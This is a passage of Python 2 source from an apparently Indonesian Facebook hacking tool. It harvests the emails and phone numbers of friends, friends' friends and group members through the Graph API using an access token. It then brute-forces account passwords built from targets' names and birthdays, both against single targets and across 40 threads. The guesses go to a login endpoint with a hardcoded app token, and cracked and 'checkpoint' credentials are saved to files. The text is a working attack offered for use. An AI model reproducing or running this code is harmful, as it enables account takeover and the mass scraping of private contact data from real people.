print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Multi Bruteforce Facebook"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Super Multi Bruteforce Facebook"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Yahoo Checker"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Crack with list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Crack from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Crack from member group"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
